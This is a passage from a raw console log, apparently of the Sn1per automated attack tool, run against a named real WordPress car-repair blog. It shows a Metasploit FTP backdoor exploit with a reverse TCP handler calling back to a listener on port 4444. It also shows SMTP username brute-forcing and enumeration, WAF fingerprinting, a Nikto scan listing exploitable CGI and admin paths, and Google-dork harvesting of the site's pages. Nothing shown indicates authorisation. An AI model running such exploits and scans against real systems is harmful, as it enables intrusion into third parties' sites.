1988. 220 You will be disconnected after 15 minutes of inactivity.
1989. [*] thegarageblog.co.uk:21 - USER: 331 User eX1b:) OK. Password required
1990. [*] Exploit completed, but no session was created.
1991. [*] Started reverse TCP double handler on 10.42.0.11:4444
1992. [*] thegarageblog.co.uk:21 - Sending Backdoor Command
1993. [*] Exploit completed, but no session was created.
1994. + -- --=[Port 22 closed... skipping.
1995. + -- --=[Port 23 closed... skipping.
1996. + -- --=[Port 25 opened... running tests...
1997.  
1998. Starting Nmap 7.12SVN ( https://nmap.org ) at 2016-07-11 10:17 EEST
1999. Nmap scan report for thegarageblog.co.uk (192.254.237.91)
2000. Host is up (0.22s latency).
2001. PORT STATE SERVICE VERSION
2002. 25/tcp open smtp Exim smtpd 4.86_1
2003. | smtp-brute:
2004. | Accounts: No valid accounts found
2005. | Statistics: Performed 10 guesses in 2 seconds, average tps: 5
2006. |_ ERROR: Too many retries, aborted ...
2007. |_smtp-commands: Couldn't establish connection on port 25
2008. | smtp-enum-users:
2009. |_ Couldn't find any accounts
2010. |_smtp-open-relay: SMTP RSET: failed to receive data: connection closed
2011. Service Info: Host: gator3130.hostgator.com
2012.  
2013. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
2014. Nmap done: 1 IP address (1 host up) scanned in 33.02 seconds
2015. Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
2016.  
2017. ----------------------------------------------------------
2018. | Scan Information |
2019. ----------------------------------------------------------
2020.  
2021. Mode ..................... VRFY
2022. Worker Processes ......... 5
2023. Usernames file ........... BruteX/wordlists/simple-users.txt
2024. Target count ............. 1
2025. Username count ........... 34
2026. Target TCP port .......... 25
2027. Query timeout ............ 5 secs
2028. Target domain ............
2029.  
2030. ######## Scan started at Mon Jul 11 10:18:13 2016 #########
2031. ######## Scan completed at Mon Jul 11 10:18:23 2016 #########
2032. 0 results.
2033.  
2034. 34 queries in 10 seconds (3.4 queries / sec)
2035.  
2036. +-------------------------------------------------------+
2037. | METASPLOIT by Rapid7 |
2038. +---------------------------+---------------------------+
2039. | __________________ | |
2040. | ==c(______(o(______(_() | |""""""""""""|======[*** |
2041. | )=\ | | EXPLOIT \ |
2042. | // \\ | |_____________\_______ |
2043. | // \\ | |==[msf >]============\ |
2044. | // \\ | |______________________\ |
2045. | // RECON \\ | \(@)(@)(@)(@)(@)(@)(@)/ |
2046. | // \\ | ********************* |
2047. +---------------------------+---------------------------+
2048. | o O o | \'\/\/\/'/ |
2049. | o O | )======( |
2050. | o | .' LOOT '. |
2051. | |^^^^^^^^^^^^^^|l___ | / _||__ \ |
2052. | | PAYLOAD |""\___, | / (_||_ \ |
2053. | |________________|__|)__| | | __||_) | |
2054. | |(@)(@)"""**|(@)(@)**|(@) | " || " |
2055. | = = = = = = = = = = = = | '--------------' |
2056. +---------------------------+---------------------------+
2057.  
2058.  
2059. Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro
2060. Learn more on http://rapid7.com/metasploit
2061.  
2062. =[ metasploit v4.12.7-dev ]
2063. + -- --=[ 1551 exploits - 898 auxiliary - 267 post ]
2064. + -- --=[ 438 payloads - 38 encoders - 8 nops ]
2065. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
2066.  
2067. RHOSTS => thegarageblog.co.uk
2068. RHOST => thegarageblog.co.uk
2069. [*] 192.254.237.91:25 - 192.254.237.91:25 Banner: 220-gator3130.hostgator.com ESMTP Exim 4.86_1 #1 Mon, 11 Jul 2016 02:18:38 -0500
2070. 220-We do not authorize the use of this system to transport unsolicited,
2071. 220 and/or bulk e-mail.
2072. [*] 192.254.237.91:25 - 192.254.237.91:25 could not be enumerated (no EXPN, no VRFY, invalid RCPT)
2073. [*] thegarageblog.co.uk:25 - Scanned 1 of 1 hosts (100% complete)
2074. [*] Auxiliary module execution completed
2075. + -- --=[Port 53 closed... skipping.
2076. + -- --=[Port 79 closed... skipping.
2077. + -- --=[Port 80 opened... running tests...
2078. ################################### Checking for WAF ##############################
2079.  
2080. ^ ^
2081. _ __ _ ____ _ __ _ _ ____
2082. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
2083. | V V // o // _/ | V V // 0 // 0 // _/
2084. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
2085. <
2086. ...'
2087.  
2088. WAFW00F - Web Application Firewall Detection Tool
2089.  
2090. By Sandro Gauci && Wendel G. Henrique
2091.  
2092. Checking http://thegarageblog.co.uk
2093. The site http://thegarageblog.co.uk is behind a ModSecurity (OWASP CRS)
2094. Number of requests: 13
2095.  
2096. ################################### Gathering HTTP Info ###########################
2097. ./whatweb: /usr/lib/ruby/vendor_ruby/rchardet/universaldetector.rb:39: invalid multibyte escape: /[\x80-\xFF]/ (SyntaxError)
2098.  
2099. __ ______ _____
2100. \ \/ / ___|_ _|
2101. \ /\___ \ | |
2102. / \ ___) || |
2103. /_/\_|____/ |_|
2104.  
2105. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
2106. + -- --=[Target: thegarageblog.co.uk:80
2107. + -- --=[Site not vulnerable to Cross-Site Tracing!
2108. + -- --=[Site not vulnerable to Host Header Injection!
2109. + -- --=[Site vulnerable to Cross-Frame Scripting!
2110. + -- --=[Site vulnerable to Clickjacking!
2111.  
2112. HTTP/1.1 405 Not Allowed
2113. Server: nginx/1.10.1
2114. Date: Mon, 11 Jul 2016 07:18:57 GMT
2115. Content-Type: text/html
2116. Content-Length: 173
2117. Connection: close
2118.  
2119. <html>
2120. <head><title>405 Not Allowed</title></head>
2121. <body bgcolor="white">
2122. <center><h1>405 Not Allowed</h1></center>
2123. <hr><center>nginx/1.10.1</center>
2124. </body>
2125. </html>
2126.  
2127. HTTP/1.1 200 OK
2128. Server: nginx/1.10.1
2129. Date: Mon, 11 Jul 2016 07:18:58 GMT
2130. Content-Type: text/html; charset=UTF-8
2131. Transfer-Encoding: chunked
2132. Connection: keep-alive
2133. Link: <http://thegarageblog.co.uk/wp-json/>; rel="https://api.w.org/"
2134.  
2135. d6
2136. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
2137. <html xmlns="http://www.w3.org/1999/xhtml">
2138. <head>
2139. <meta http-equiv="Content-Type" content="
2140.  
2141.  
2142.  
2143.  
2144. ################################### Checking HTTP Headers #########################
2145. + -- --=[Checking if X-Content options are enabled on thegarageblog.co.uk...
2146.  
2147. + -- --=[Checking if X-Frame options are enabled on thegarageblog.co.uk...
2148.  
2149. + -- --=[Checking if X-XSS-Protection header is enabled on thegarageblog.co.uk...
2150.  
2151. + -- --=[Checking HTTP methods on thegarageblog.co.uk...
2152.  
2153. + -- --=[Checking if TRACE method is enabled on thegarageblog.co.uk...
2154.  
2155. + -- --=[Checking for open proxy on thegarageblog.co.uk...
2156. <head>
2157. <meta name="robots" content="noarchive" />
2158. <meta name="googlebot" content="nosnippet" />
2159. </head>
2160. <body>
2161. <div align=center>
2162. <h3>Error. Page cannot be displayed. Please contact your service provider for more details. (9)</h3>
2163. </div>
2164. </body>
2165. </html>
2166. + -- --=[Enumerating software on thegarageblog.co.uk...
2167. Server: nginx/1.10.1
2168.  
2169. + -- --=[Checking if Strict-Transport-Security is enabled on thegarageblog.co.uk...
2170.  
2171. + -- --=[Checking for Flash cross-domain policy on thegarageblog.co.uk...
2172. var mejsL10n = {"language":"en-US","strings":{"Close":"Close","Fullscreen":"Fullscreen","Download File":"Download File","Download Video":"Download Video","Play\/Pause":"Play\/Pause","Mute Toggle":"Mute Toggle","None":"None","Turn off Fullscreen":"Turn off Fullscreen","Go Fullscreen":"Go Fullscreen","Unmute":"Unmute","Mute":"Mute","Captions\/Subtitles":"Captions\/Subtitles"}};
2173. var _wpmejsSettings = {"pluginPath":"\/wp-includes\/js\/mediaelement\/"};
2174. /* ]]> */
2175. </script>
2176. <script type='text/javascript' src='http://thegarageblog.co.uk/wp-includes/js/mediaelement/mediaelement-and-player.min.js?ver=2.18.1-a'></script>
2177. <script type='text/javascript' src='http://thegarageblog.co.uk/wp-includes/js/comment-reply.min.js?ver=4.4.4'></script>
2178. <script type='text/javascript' src='http://thegarageblog.co.uk/wp-includes/js/wp-embed.min.js?ver=4.4.4'></script>
2179.  
2180. </body>
2181. </html>
2182. + -- --=[Checking for Silverlight cross-domain policy on thegarageblog.co.uk...
2183. var mejsL10n = {"language":"en-US","strings":{"Close":"Close","Fullscreen":"Fullscreen","Download File":"Download File","Download Video":"Download Video","Play\/Pause":"Play\/Pause","Mute Toggle":"Mute Toggle","None":"None","Turn off Fullscreen":"Turn off Fullscreen","Go Fullscreen":"Go Fullscreen","Unmute":"Unmute","Mute":"Mute","Captions\/Subtitles":"Captions\/Subtitles"}};
2184. var _wpmejsSettings = {"pluginPath":"\/wp-includes\/js\/mediaelement\/"};
2185. /* ]]> */
2186. </script>
2187. <script type='text/javascript' src='http://thegarageblog.co.uk/wp-includes/js/mediaelement/mediaelement-and-player.min.js?ver=2.18.1-a'></script>
2188. <script type='text/javascript' src='http://thegarageblog.co.uk/wp-includes/js/comment-reply.min.js?ver=4.4.4'></script>
2189. <script type='text/javascript' src='http://thegarageblog.co.uk/wp-includes/js/wp-embed.min.js?ver=4.4.4'></script>
2190.  
2191. </body>
2192. </html>
2193. + -- --=[Checking for HTML5 cross-origin resource sharing on thegarageblog.co.uk...
2194.  
2195. + -- --=[Retrieving robots.txt on thegarageblog.co.uk...
2196. User-agent: *
2197. Disallow: /wp-admin/
2198. Allow: /wp-admin/admin-ajax.php
2199.  
2200. + -- --=[Retrieving sitemap.xml on thegarageblog.co.uk...
2201. var mejsL10n = {"language":"en-US","strings":{"Close":"Close","Fullscreen":"Fullscreen","Download File":"Download File","Download Video":"Download Video","Play\/Pause":"Play\/Pause","Mute Toggle":"Mute Toggle","None":"None","Turn off Fullscreen":"Turn off Fullscreen","Go Fullscreen":"Go Fullscreen","Unmute":"Unmute","Mute":"Mute","Captions\/Subtitles":"Captions\/Subtitles"}};
2202. var _wpmejsSettings = {"pluginPath":"\/wp-includes\/js\/mediaelement\/"};
2203. /* ]]> */
2204. </script>
2205. <script type='text/javascript' src='http://thegarageblog.co.uk/wp-includes/js/mediaelement/mediaelement-and-player.min.js?ver=2.18.1-a'></script>
2206. <script type='text/javascript' src='http://thegarageblog.co.uk/wp-includes/js/comment-reply.min.js?ver=4.4.4'></script>
2207. <script type='text/javascript' src='http://thegarageblog.co.uk/wp-includes/js/wp-embed.min.js?ver=4.4.4'></script>
2208.  
2209. </body>
2210. </html>
2211. + -- --=[Checking cookie attributes on thegarageblog.co.uk...
2212.  
2213. + -- --=[Checking for ASP.NET Detailed Errors on thegarageblog.co.uk...
2214. <body class="error404">
2215. <body class="error404">
2216.  
2217.  
2218. ################################### Running Web Vulnerability Scan ################
2219. - Nikto v2.1.6
2220. ---------------------------------------------------------------------------
2221. + Target IP: 192.254.237.91
2222. + Target Hostname: thegarageblog.co.uk
2223. + Target Port: 80
2224. + Start Time: 2016-07-11 10:19:16 (GMT3)
2225. ---------------------------------------------------------------------------
2226. + Server: nginx/1.10.1
2227. + The anti-clickjacking X-Frame-Options header is not present.
2228. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
2229. + Uncommon header 'link' found, with contents: <http://thegarageblog.co.uk/wp-json/>; rel="https://api.w.org/"
2230. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
2231. + Entry '/wp-admin/' in robots.txt returned a non-forbidden or redirect HTTP code (302)
2232. + Entry '/wp-admin/admin-ajax.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
2233. + "robots.txt" contains 2 entries which should be manually viewed.
2234. + Web Server returns a valid response with junk HTTP methods, this may cause false positives.
2235. + /cgi-sys/formmail.cgi: The remote CGI reveals its version number, which may aid attackers in finding vulnerabilities in the script.
2236. + /cgi-sys/formmail.pl: Many versions of FormMail have remote vulnerabilities, including file access, information disclosure and email abuse. FormMail access should be restricted as much as possible or a more secure solution found.
2237. + /webmail/blank.html: IlohaMail 0.8.10 contains an XSS vulnerability. Previous versions contain other non-descript vulnerabilities.
2238. + /securecontrolpanel/: Web Server Control Panel
2239. + /webmail/: Web based mail package installed.
2240. + /cgi-sys/Count.cgi: This may allow attackers to execute arbitrary commands on the server
2241. + OSVDB-3233: /mailman/listinfo: Mailman was found on the server.
2242. + OSVDB-2117: /cpanel/: Web-based control panel
2243. + OSVDB-3092: /cgi-sys/entropysearch.cgi?query=asdfasdf&user=root&basehref=%2F%2Fwww.yourdomain.com/: CPanel's Entropy Search allows username enumeration via the user parameter.
2244. + OSVDB-3092: /cgi-sys/FormMail-clone.cgi: Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web
2245. + OSVDB-3092: /img-sys/: Default image directory should not allow directory listing.
2246. + OSVDB-3092: /java-sys/: Default Java directory should not allow directory listing.
2247.  
2248. + OSVDB-3093: /webmail/lib/emailreader_execute_on_each_page.inc.php: This might be interesting... has been seen in web logs from an unknown scanner.
2249. + OSVDB-62684: /wp-content/plugins/hello.php: The WordPress hello.php plugin reveals a file system path
2250. + /readme.html: This WordPress file reveals the installed version.
2251. + /wp-links-opml.php: This WordPress script reveals the installed version.
2252. + OSVDB-3092: /license.txt: License file found may identify site software.
2253. + /controlpanel/: Admin login page/section found.
2254. + /wordpress/: A Wordpress installation was found.
2255. + OSVDB-3268: /wp-content/uploads/: Directory indexing found.
2256. + /wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information
2257. + /fantastico_fileslist.txt: fantastico_fileslist.txt file found. This file contains a list of all the files from the current directory.
2258. + Server leaks inodes via ETags, header found with file /cgi-bin/c99.php, fields: 0x56a90723 0x16e2
2259.  
2260. + 9127 requests: 0 error(s) and 31 item(s) reported on remote host
2261. + End Time: 2016-07-11 11:54:02 (GMT3) (5686 seconds)
2262. ---------------------------------------------------------------------------
2263. + 1 host(s) tested
2264. ################################### Saving Web Screenshots ########################
2265. [+] Screenshot saved to /root/Sn1per/loot/thegarageblog.co.uk-port80.jpg
2266.  
2267. (cutycapt:30735): Gtk-WARNING **: Theme directory devices/scalable of theme maia has no size field
2268.  
2269. ################################### Running Google Hacking Queries #############
2270. ################################### Running InUrlBR OSINT Queries ##############
2271.  
2272. _____ .701F. .iBR. .7CL. .70BR. .7BR. .7BR'''Cq. .70BR. .1BR'''Yp, .8BR'''Cq.
2273. (_____) 01 01N. C 01 C 01 .01. 01 01 Yb 01 .01.
2274. (() ()) 01 C YCb C 01 C 01 ,C9 01 01 dP 01 ,C9
2275. \ / 01 C .CN. C 01 C 0101dC9 01 01'''bg. 0101dC9
2276. \ / 01 C .01.C 01 C 01 YC. 01 , 01 .Y 01 YC.
2277. /=\ 01 C Y01 YC. ,C 01 .Cb. 01 ,C 01 ,9 01 .Cb.
2278. [___] .J01L. .JCL. YC .b0101d'. .J01L. .J01. .J01010101C .J0101Cd9 .J01L. .J01./ 2.1
2279.  
2280. __[ ! ] Neither war between hackers, nor peace for the system.
2281. __[ ! ] http://blog.inurl.com.br
2282. __[ ! ] http://fb.com/InurlBrasil
2283. __[ ! ] http://twitter.com/@googleinurl
2284. __[ ! ] http://github.com/googleinurl
2285. __[ ! ] Current PHP version::[ 5.6.22-2 ]
2286. __[ ! ] Current script owner::[ root ]
2287. __[ ! ] Current uname::[ Linux anonymous 4.6.0-parrot-amd64 #1 SMP Parrot 4.6.2-2parrot0 (2016-06-29) x86_64 ]
2288. __[ ! ] Current pwd::[ /root/Sn1per ]
2289. __[ ! ] Help: php inurlbr.php --help
2290. ------------------------------------------------------------------------------------------------------------------------
2291.  
2292. [ ! ] Starting SCANNER INURLBR 2.1 at [11-07-2016 11:54:20]
2293. [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
2294. It is the end user's responsibility to obey all applicable local, state and federal laws.
2295. Developers assume no liability and are not responsible for any misuse or damage caused by this program
2296.  
2297. [ INFO ][ OUTPUT FILE ]:: [ /root/Sn1per/output/loot/inurlbr-thegarageblog.co.uk.txt ]
2298. [ INFO ][ DORK ]::[ site:thegarageblog.co.uk ]
2299. [ INFO ][ SEARCHING ]:: {
2300. [ INFO ][ ENGINE ]::[ GOOGLE - www.google.cg ]
2301.  
2302. [ INFO ][ SEARCHING ]::
2303. -[:::]
2304. [ INFO ][ ENGINE ]::[ GOOGLE API ]
2305.  
2306. [ INFO ][ SEARCHING ]::
2307. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
2308. [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.la ID: 010479943387663786936:wjwf2xkhfmq ]
2309.  
2310. [ INFO ][ SEARCHING ]::
2311. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
2312.  
2313. [ INFO ][ TOTAL FOUND VALUES ]:: [ 100 ]
2314.  
2315.  
2316. _[ - ]::--------------------------------------------------------------------------------------------------------------
2317. |_[ + ] [ 0 / 100 ]-[11:54:41] [ - ]
2318. |_[ + ] Target:: [ http://thegarageblog.co.uk/ ]
2319. |_[ + ] Exploit::
2320. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2321. |_[ + ] More details:: / - / , ISP:
2322. |_[ + ] Found:: UNIDENTIFIED
2323.  
2324. _[ - ]::--------------------------------------------------------------------------------------------------------------
2325. |_[ + ] [ 1 / 100 ]-[11:54:43] [ - ]
2326. |_[ + ] Target:: [ http://thegarageblog.co.uk/page/2/ ]
2327. |_[ + ] Exploit::
2328. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2329. |_[ + ] More details:: / - / , ISP:
2330. |_[ + ] Found:: UNIDENTIFIED
2331.  
2332. _[ - ]::--------------------------------------------------------------------------------------------------------------
2333. |_[ + ] [ 2 / 100 ]-[11:54:44] [ - ]
2334. |_[ + ] Target:: [ http://thegarageblog.co.uk/page/32/ ]
2335. |_[ + ] Exploit::
2336. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2337. |_[ + ] More details:: / - / , ISP:
2338. |_[ + ] Found:: UNIDENTIFIED
2339.  
2340. _[ - ]::--------------------------------------------------------------------------------------------------------------
2341. |_[ + ] [ 3 / 100 ]-[11:54:46] [ - ]
2342. |_[ + ] Target:: [ http://thegarageblog.co.uk/page/36/ ]
2343. |_[ + ] Exploit::
2344. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2345. |_[ + ] More details:: / - / , ISP:
2346. |_[ + ] Found:: UNIDENTIFIED
2347.  
2348. _[ - ]::--------------------------------------------------------------------------------------------------------------
2349. |_[ + ] [ 4 / 100 ]-[11:54:47] [ - ]
2350. |_[ + ] Target:: [ http://thegarageblog.co.uk/page/4/ ]
2351. |_[ + ] Exploit::
2352. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2353. |_[ + ] More details:: / - / , ISP:
2354. |_[ + ] Found:: UNIDENTIFIED
2355.  
2356. _[ - ]::--------------------------------------------------------------------------------------------------------------
2357. |_[ + ] [ 5 / 100 ]-[11:54:49] [ - ]
2358. |_[ + ] Target:: [ http://thegarageblog.co.uk/page/9/ ]
2359. |_[ + ] Exploit::
2360. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2361. |_[ + ] More details:: / - / , ISP:
2362. |_[ + ] Found:: UNIDENTIFIED
2363.  
2364. _[ - ]::--------------------------------------------------------------------------------------------------------------
2365. |_[ + ] [ 6 / 100 ]-[11:54:50] [ - ]
2366. |_[ + ] Target:: [ http://thegarageblog.co.uk/page/3/ ]
2367. |_[ + ] Exploit::
2368. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2369. |_[ + ] More details:: / - / , ISP:
2370. |_[ + ] Found:: UNIDENTIFIED
2371.  
2372. _[ - ]::--------------------------------------------------------------------------------------------------------------
2373. |_[ + ] [ 7 / 100 ]-[11:54:52] [ - ]
2374. |_[ + ] Target:: [ http://thegarageblog.co.uk/page/30/ ]
2375. |_[ + ] Exploit::
2376. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2377. |_[ + ] More details:: / - / , ISP:
2378. |_[ + ] Found:: UNIDENTIFIED
2379.  
2380. _[ - ]::--------------------------------------------------------------------------------------------------------------
2381. |_[ + ] [ 8 / 100 ]-[11:54:53] [ - ]
2382. |_[ + ] Target:: [ http://thegarageblog.co.uk/advertising/ ]
2383. |_[ + ] Exploit::
2384. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2385. |_[ + ] More details:: / - / , ISP:
2386. |_[ + ] Found:: UNIDENTIFIED
2387.  
2388. _[ - ]::--------------------------------------------------------------------------------------------------------------
2389. |_[ + ] [ 9 / 100 ]-[11:54:55] [ - ]
2390. |_[ + ] Target:: [ http://thegarageblog.co.uk/the-garage/ ]
2391. |_[ + ] Exploit::
2392. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2393. |_[ + ] More details:: / - / , ISP:
2394. |_[ + ] Found:: UNIDENTIFIED
2395.  
2396. _[ - ]::--------------------------------------------------------------------------------------------------------------
2397. |_[ + ] [ 10 / 100 ]-[11:54:56] [ - ]
2398. |_[ + ] Target:: [ http://thegarageblog.co.uk/tag/garage/ ]
2399. |_[ + ] Exploit::
2400. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2401. |_[ + ] More details:: / - / , ISP:
2402. |_[ + ] Found:: UNIDENTIFIED
2403.  
2404. _[ - ]::--------------------------------------------------------------------------------------------------------------
2405. |_[ + ] [ 11 / 100 ]-[11:54:58] [ - ]
2406. |_[ + ] Target:: [ http://thegarageblog.co.uk/category/garage/ ]
2407. |_[ + ] Exploit::
2408. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2409. |_[ + ] More details:: / - / , ISP:
2410. |_[ + ] Found:: UNIDENTIFIED
2411.  
2412. _[ - ]::--------------------------------------------------------------------------------------------------------------
2413. |_[ + ] [ 12 / 100 ]-[11:54:59] [ - ]
2414. |_[ + ] Target:: [ http://thegarageblog.co.uk/author/admin/ ]
2415. |_[ + ] Exploit::
2416. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2417. |_[ + ] More details:: / - / , ISP:
2418. |_[ + ] Found:: UNIDENTIFIED
2419.  
2420. _[ - ]::--------------------------------------------------------------------------------------------------------------
2421. |_[ + ] [ 13 / 100 ]-[11:55:01] [ - ]
2422. |_[ + ] Target:: [ http://thegarageblog.co.uk/tag/battery/ ]
2423. |_[ + ] Exploit::
2424. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2425. |_[ + ] More details:: / - / , ISP:
2426. |_[ + ] Found:: UNIDENTIFIED
2427.  
2428. _[ - ]::--------------------------------------------------------------------------------------------------------------
2429. |_[ + ] [ 14 / 100 ]-[11:55:02] [ - ]
2430. |_[ + ] Target:: [ http://thegarageblog.co.uk/tag/mot/ ]
2431. |_[ + ] Exploit::
2432. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2433. |_[ + ] More details:: / - / , ISP:
2434. |_[ + ] Found:: UNIDENTIFIED
2435.  
2436. _[ - ]::--------------------------------------------------------------------------------------------------------------
2437. |_[ + ] [ 15 / 100 ]-[11:55:03] [ - ]
2438. |_[ + ] Target:: [ http://thegarageblog.co.uk/tag/engine/ ]
2439. |_[ + ] Exploit::
2440. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2441. |_[ + ] More details:: / - / , ISP:
2442. |_[ + ] Found:: UNIDENTIFIED
2443.  
2444. _[ - ]::--------------------------------------------------------------------------------------------------------------
2445. |_[ + ] [ 16 / 100 ]-[11:55:05] [ - ]
2446. |_[ + ] Target:: [ http://thegarageblog.co.uk/tag/failure/ ]
2447. |_[ + ] Exploit::
2448. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2449. |_[ + ] More details:: / - / , ISP:
2450. |_[ + ] Found:: UNIDENTIFIED
2451.  
2452. _[ - ]::--------------------------------------------------------------------------------------------------------------
2453. |_[ + ] [ 17 / 100 ]-[11:55:06] [ - ]
2454. |_[ + ] Target:: [ http://thegarageblog.co.uk/category/cars/ ]
2455. |_[ + ] Exploit::
2456. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2457. |_[ + ] More details:: / - / , ISP:
2458. |_[ + ] Found:: UNIDENTIFIED
2459.  
2460. _[ - ]::--------------------------------------------------------------------------------------------------------------
2461. |_[ + ] [ 18 / 100 ]-[11:55:08] [ - ]
2462. |_[ + ] Target:: [ http://thegarageblog.co.uk/tag/alternator/ ]
2463. |_[ + ] Exploit::
2464. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2465. |_[ + ] More details:: / - / , ISP:
2466. |_[ + ] Found:: UNIDENTIFIED
2467.  
2468. _[ - ]::--------------------------------------------------------------------------------------------------------------
2469. |_[ + ] [ 19 / 100 ]-[11:55:09] [ - ]
2470. |_[ + ] Target:: [ http://thegarageblog.co.uk/tag/breakdown/ ]
2471. |_[ + ] Exploit::
2472. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2473. |_[ + ] More details:: / - / , ISP:
2474. |_[ + ] Found:: UNIDENTIFIED
2475.  
2476. _[ - ]::--------------------------------------------------------------------------------------------------------------
2477. |_[ + ] [ 20 / 100 ]-[11:55:10] [ - ]
2478. |_[ + ] Target:: [ http://thegarageblog.co.uk/tag/playstation/ ]
2479. |_[ + ] Exploit::
2480. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2481. |_[ + ] More details:: / - / , ISP:
2482. |_[ + ] Found:: UNIDENTIFIED
2483.  
2484. _[ - ]::--------------------------------------------------------------------------------------------------------------
2485. |_[ + ] [ 21 / 100 ]-[11:55:12] [ - ]
2486. |_[ + ] Target:: [ http://thegarageblog.co.uk/tag/oil/ ]
2487. |_[ + ] Exploit::
2488. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2489. |_[ + ] More details:: / - / , ISP:
2490. |_[ + ] Found:: UNIDENTIFIED
2491.  
2492. _[ - ]::--------------------------------------------------------------------------------------------------------------
2493. |_[ + ] [ 22 / 100 ]-[11:55:13] [ - ]
2494. |_[ + ] Target:: [ http://thegarageblog.co.uk/tag/parts/ ]
2495. |_[ + ] Exploit::
2496. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2497. |_[ + ] More details:: / - / , ISP:
2498. |_[ + ] Found:: UNIDENTIFIED
2499.  
2500. _[ - ]::--------------------------------------------------------------------------------------------------------------
2501. |_[ + ] [ 23 / 100 ]-[11:55:14] [ - ]
2502. |_[ + ] Target:: [ http://thegarageblog.co.uk/tag/spares/ ]
2503. |_[ + ] Exploit::
2504. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2505. |_[ + ] More details:: / - / , ISP:
2506. |_[ + ] Found:: UNIDENTIFIED
2507.  
2508. _[ - ]::--------------------------------------------------------------------------------------------------------------
2509. |_[ + ] [ 24 / 100 ]-[11:55:16] [ - ]
2510. |_[ + ] Target:: [ http://thegarageblog.co.uk/tag/charging/ ]
2511. |_[ + ] Exploit::
2512. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2513. |_[ + ] More details:: / - / , ISP:
2514. |_[ + ] Found:: UNIDENTIFIED
2515.  
2516. _[ - ]::--------------------------------------------------------------------------------------------------------------
2517. |_[ + ] [ 25 / 100 ]-[11:55:17] [ - ]
2518. |_[ + ] Target:: [ http://thegarageblog.co.uk/tag/repair/ ]
2519. |_[ + ] Exploit::
2520. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2521. |_[ + ] More details:: / - / , ISP:
2522. |_[ + ] Found:: UNIDENTIFIED
2523.  
2524. _[ - ]::--------------------------------------------------------------------------------------------------------------
2525. |_[ + ] [ 26 / 100 ]-[11:55:18] [ - ]
2526. |_[ + ] Target:: [ http://thegarageblog.co.uk/tag/cooking/ ]
2527. |_[ + ] Exploit::
2528. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2529. |_[ + ] More details:: / - / , ISP:
2530. |_[ + ] Found:: UNIDENTIFIED
2531.  
2532. _[ - ]::--------------------------------------------------------------------------------------------------------------
2533. |_[ + ] [ 27 / 100 ]-[11:55:20] [ - ]
2534. |_[ + ] Target:: [ http://thegarageblog.co.uk/tag/ice/ ]
2535. |_[ + ] Exploit::
2536. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2537. |_[ + ] More details:: / - / , ISP:
